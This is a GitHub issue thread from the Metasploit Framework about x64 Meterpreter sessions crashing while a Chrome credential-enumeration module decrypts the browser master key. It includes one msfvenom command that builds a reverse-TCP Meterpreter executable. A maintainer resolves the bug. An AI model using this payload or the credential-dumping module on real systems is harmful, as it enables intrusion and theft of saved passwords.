### ISSUE TITLE
All windows x64_meterpreter based sessions (both staged & stageless) die upon decrypting chrome's masterkey

### ISSUE THREAD

**Issue by Admin9961** [rapid7/metasploit-framework#18544] opened 2023-11-17 01:04 UTC
Snippets says nothing relevant, to confirm just make
msfvenom -p windows/x64/meterpreter_reverse_tcp (or the staged variant) lhost=x.x.x.x lport=4444 -f exe -o test.exe
then launch post_chrome enum

x86 decrypt successfully

Target system
Windows 10 x64 with last Chrome v.
Attacker system
Linux 20.04 with last Metasploit v.

**Comment by smcintyre-r7** [comment] 2023-11-20 20:49
I was able to reproduce this issue. It looks like there needs to be at least one saved password for the master key to be created and then decrypted. I think I have an idea of what could be wrong so I'll look into it and get it fixed.

**Comment by smcintyre-r7** [comment] 2023-11-20 22:07
Thanks alot for bringing this issue to our attention. It'll be resolved once #18558 is landed.

As I suspected, it was an issue with a railgun definition.

**Closed** 2023-11-21 15:26 UTC
Labels: bug, confirmed
